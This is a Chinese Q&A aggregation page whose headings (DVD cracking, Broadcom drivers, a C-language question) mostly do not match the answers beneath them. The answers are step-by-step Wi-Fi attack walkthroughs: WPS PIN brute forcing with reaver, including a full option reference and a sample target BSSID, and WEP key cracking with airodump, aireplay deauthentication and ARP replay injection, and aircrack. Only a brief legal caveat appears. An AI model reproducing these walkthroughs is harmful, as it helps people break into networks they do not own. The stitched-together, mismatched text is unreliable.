airodump源码(adaboost源码)
本文目录一览:
- 1、airodump-ng和aircrack-ng的区别
- 2、linux reaver怎么用
- 3、跪求broadcom 43XX无线破解驱动!无线网络高人来
- 4、锁密码的dvd怎么破解?
- 5、C语言实现 获取linux系统正在连接的无线网络的 网络名,和加密方式
airodump-ng和aircrack-ng的区别
在Mac下面使用Aircrack-ng要解决的两个问题:Aircrack-ng在Mac下如何安装。
使用airport而不是Aircrack-ng中的工具获取握手包。
1.Aircrack-ng在Mac下编译的问题。
直接使用make源码有问题,可以使用Macport进行安装。
Macport已经预置了Aircrack-ng,brew没有。
安装好Macport之后,命令行下:sudoportinstallaircrack-ng,Macport会自动下载编译和安装。
2.获取握手包的问题。
Mac下面使用Aircrack-ng包中的airmon-ng进行嗅探有问题,会提示wireless-tools找不到,因为Airmon-ng依赖于wireless-tools,而Linuxwireless-tools在Mac下的编译也有问题。
如果使用wireshark的Monmode也有问题,wireshark的监听模式认为Mac的网卡不支持监听模式。
其实Mac本身自带一个airport工具,可以很方便的扫描和在监听模式下进行监听:airport-s进行扫描,airporten1sniff1进行监听。
linux reaver怎么用
需要工具:reaver
原理:穷举PIN码以攻破无线路由器的安全防护
安装:
下载源码
从这个网址下载reaver源代码
wget
解压
tar-xzvf reaver-1.4.tar.gz
安装必要的软件依赖库和工具
在您编译reaver前需要先安装pcaplib等工具,后面还需要aircrack-ng
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
编译和安装
配置和编译Reaver
cd reaver-1.4
cd src
./configure
make
下载aircrack-ng源代码并编译
从Ubuntu12.04版本开始aircrack-ng不再被包含在版本软件仓库中,不过我们可以从网上下载它的源代码进行编译安装。如果aircrack-ng已经存在,则不必安装。./configure
make
sudo install
解压 tar -xzvf reaver-1.4.tar.gz
安装必要的软件依赖库和工具
在您编译 reaver前需要先安装 pcaplib等工具,后面还需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
编译和安装
配置和编译 Reaver
cd reaver-1.4 cd src ./configure make
安装 Reaver
sudo make install
方法:
1 输入:airmon-ng start wlan0 开启监听模式 (屏幕显示 加载8187L驱动成功–一次就加载成功啊!)
2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C,结束进程,这时记下你要PJ的目标路由MAC.
3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..),按Ctrl+C,结束扫描.
注:如果你已知对方无线路由信息 第2,第3步 可省略!
4 输入:reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码
注:随时可以按CTRL+C退出保存进程,下次按下光标控制键“上”键然后回车,进程可继续。
实战我输入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只见屏幕飞闪……爽啊!
reaver 参数详解
必须参数
-i, –interface=wlan Name of the monitor-mode interface to use
网卡的监视接口,通常是mon0
-b, –bssid=mac BSSID of the target AP
AP的MAC地址
Optional Arguments: 可选参数
-m, –mac=mac MAC of the host system
指定本机MAC地址
-e, –essid=ssid ESSID of the target AP
路由器的ESSID,一般不用指定
-c, –channel=channel Set the 802.11 channel for the interface (implies -f)
信号的频道,如果不指定会自动扫描
-o, –out-file=file Send output to a log file [stdout]
输出日志文件
-s, –session=file Restore a previous session file
恢复进度文件
-C, –exec=command Execute the supplied command upon successful pin recovery
pin成功后执行命令
-D, –daemonize Daemonize reaver
设置reaver成Daemon
-a, –auto Auto detect the best advanced options for the target AP
对目标AP自动检测高级参数
-f, –fixed Disable channel hopping
禁止频道跳转
-5, –5ghz Use 5GHz 802.11 channels
使用5G频道
-v, –verbose Display non-critical warnings (-vv for more)
显示不重要警告信息 -vv 可以显示更多
-q, –quiet Only display critical messages
只显示关键信息
-h, –help Show help
显示帮助
Advanced Options:高级选项
-p, –pin=wps pin Use the specified 4 or 8 digit WPS pin
使用指定的4位或者8位pin码
-d, –delay=seconds Set the delay between pin attempts [1]
pin间延时,默认1秒
-l, –lock-delay=seconds Set the time to wait if the AP locks WPS pin attempts [60]
AP锁定WPS后等待时间
-g, –max-attempts=num Quit after num pin attempts
最大pin次数
Reaver 参数
—天天
-x, –fail-wait=seconds Set the time to sleep after 10 unexpected failures [0]
10次意外失败后等待时间,默认0秒
-r, –recurring-delay=x:y Sleep for y seconds every x pin attempts
每x次pin后等待y秒
-t, –timeout=seconds Set the receive timeout period [5]
收包超时,默认5秒
-T, –m57-timeout=seconds Set the M5/M7 timeout period [0.20]
M5/M7超时,默认0.2秒
-A, –no-associate Do not associate with the AP (association must be done by another application)
不连入AP(连入过程必须有其他程序完成)
-N, –no-nacks Do not send NACK messages when out of order packets are received
不发送NACK信息(如果一直pin不动,可以尝试这个参数)
-S, –dh-small Use small DH keys to improve crack speed
使用小DH关键值提高速度(推荐使用)
-L, –ignore-locks Ignore locked state reported by the target AP
忽略目标AP报告的锁定状态
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
每当收到EAP失败包就终止WPS进程
-n, –nack Target AP always sends a NACK [Auto]
对目标AP总是发送NACK,默认自动
-w, –win7 Mimic a Windows 7 registrar [False]
模拟win7注册,默认关闭
Ps:影响到无线的因素很多,所以各参数之间的配合很重要,当然,最关键的还是取决于信号。
原理详细:
什么是PIN码?
印在无线路由器设备标签上的一组8位数字字符串,无线路由器管理界面中当然也会存在并可更改。
PIN码有什么用?
在无线网卡的配套管理软件(如TP-LINK的QSS软件)里输入无线路由器设备上的那8位数字字符串就可以成功登录该已被加密的无线路由器。
穷举PIN码是什么意思?
既然知道了无线路由器PIN值的范围(8位纯数字),且目前大部分设备的WPS是呈开启状态的,那么穷举PIN码以攻破无线路由器的安全防护这一暴力行为就有了*理论*可行性
跪求broadcom 43XX无线破解驱动!无线网络高人来
用Ubuntu破解WEP密钥
第一步,很显然,是安装Ubuntu。从CD启动,按指示操作,非常简单。要注意的是,接下来的每一步都要有序进行,否则就达不到预期目标。 下一步是安装其它程序。首先要保证你的本本可以联网。安装其它程序,需要打开一个终端窗口,并键入如下代码:
sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list
在编辑器中,用以下代码代替其它东西:
## Add comments (##) in front of any line to remove it from being checked. ## Use the following sources.list at your own risk.
deb dapper main restricted universe multiverse
deb-src dapper main restricted universe multiverse
## MAJOR BUG FIX UPDATES produced after the final release
deb dapper-updates main restricted universe multiverse
deb-src dapper-updates main restricted universe multiverse
## UBUNTU SECURITY UPDATES
deb dapper-security main restricted universe multiverse
deb-src dapper-security main restricted universe multiverse
## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb dapper-backports main restricted universe multiverse
deb-src dapper-backports main restricted universe multiverse
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb dapper free non-free
deb-src dapper free non-free
保存文件、退出编辑器。敲入如下命令:
sudo apt-get update
现在我们可以安装后续将会用到的包了:
sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils
接下来你应该更新整个系统,方法是,进入系统菜单——Administration——Update Manager。单击“Check”,开始安装更新。然后重启系统。完成后,为Madwifi驱动打补丁。
这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器是Atheros Communications……
我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端:
sudo -i cd /usr/src
wget
wget
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make make install
modprobe ath_pci
如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。
sudo gedit /etc/kismet/kismet.conf
把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。
现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。
sudo airmon start ath0
sudo kismet
找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。
接下来运行airodump。
sudo airodump ath0 filename channel# 1
文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。
从airodump中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行aireplay,开始注入数据包,导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0
应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。
接下来我们想开始注入数据包。
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情:
sudo aireplay -0 ath0 -a BSSID ath0
否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。
sudo aircrack filename.ivs
一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。
这做起来一点都不费劲,但可以起作用。
锁密码的dvd怎么破解?
1使用Linux。Windows无法嗅出WEP数据包,但你可以使用Linux的启动CD 。来自网页,仅供参考!
2获取一个数据包嗅探程序。BackTrack是一个常用的软件包。下载ISO映像,并刻录到启动CD / DVD 。
3启动Linux 和Backtrack。使用启动CD / DVD 。
注意,此操作系统是不需要安装在硬盘驱动器上。这意味着只要你关闭Backtrack,所有数据都将丢失。
4选择一个启动选项。开机后以下Backtrack屏幕会显示。用向上和向下箭头键更改选项,并选择一个。本教程将使用第一个选项。
5通过操作指令装载图形界面。在这个选项中,Backtrack由操作指令启动。键入:startx来继续。
6点击左下角的 “终端”按钮。这将是第五个选项。
7等待Linux命令终端打开。
8查看你的无线局域网类型。输入下面的命令:“ airmon-ng ”(不含引号)。你应该在界面下方看到类似WLAN0的字样。.
9获取所有接入点所需的信息。输入下面的命令: “airodump-ng wlan0”(不含引号) 。你应该得到三件事情:
BSSID
通道
ESSID (AP 名称)
下面是本教程的情况:
BSSID 00:17:3F:76:36:6E
1号通道
ESSID(AP 名称)Suleman
10输入下面命令。这一次将使用上面例子的信息,但你应该输入自己的。命令airodump-ng -w wep -c 1 -- bssid 00:17:3F:76:36:6E wlan0” (不带引号) 。
11允许设置开始。
12打开一个新的终端窗口。键入下面的命令,你自己的BSSID ,通道和ESSID值替代。命令: “aireplay-ng -1 0 –a 00:17:3f:76:36:6E wlan0” (不含引号) 。
13打开另一个新的终端窗口。键入以下命令:“aireplay-ng -3 –b 00:17:3f:76:36:6e wlan0”(不含引号) 。
14允许设置开始。
15回第一个终端窗口。
16让此窗口中的数据达到30000以上。根据接入点的无线信号,硬件和负载这将需要15至60分钟(或更多) 。
17转到第三终端窗口,然后按Ctrl + c 。
18拉出目录。键入以下命令:“ dir”命令(不含引号) 。这将显示在解密过程中保存的目录。
19使用.cap档案。这个例子中是以下内容“aircrack-ng web-02.cap”(不含引号)。如下图所示的设置将启动。
20破解WEP密码。这个设置完成后,就可以破解密码。在这个例子中,它是{ ADA2D18D2E } 。
提示
01有关网络安全的法律各地不同。确保你知道你需要知道的,并准备面对你的行动引起的一切后果。
02许多嗅探程序,诸如Wireshark(以前称为Ethereal ),AirSnort和Kismet,提供嗅探程序源代码。你需要有一些使用Linux或Windows源代码编译的背景知识来使用Airsnort或Kismet。 Wireshark(Ethereal )自带安装程序,或者你可以下载源代码。
03你可能找到大多数已编译的程序。
仅供参考!
C语言实现 获取linux系统正在连接的无线网络的 网络名,和加密方式
第一步: 下载 aircrack
最简单的方法就是找开Ubuntu 软件管理中心 , 在这里直查找 aircrack ,找到后直接下载安装就可以了,非常方便。
第二步:启动无线网卡的监控模式
sudo airmon-ng start wlan0 启动无线 网卡 的监控模式。
第三步:查找你周围的无线网络
sudo airodump-ng mon0
会出现你周围的无线网络列表
如果楼主有兴趣有毅力的话,可以把aircrack源代码读玩.
官方网站为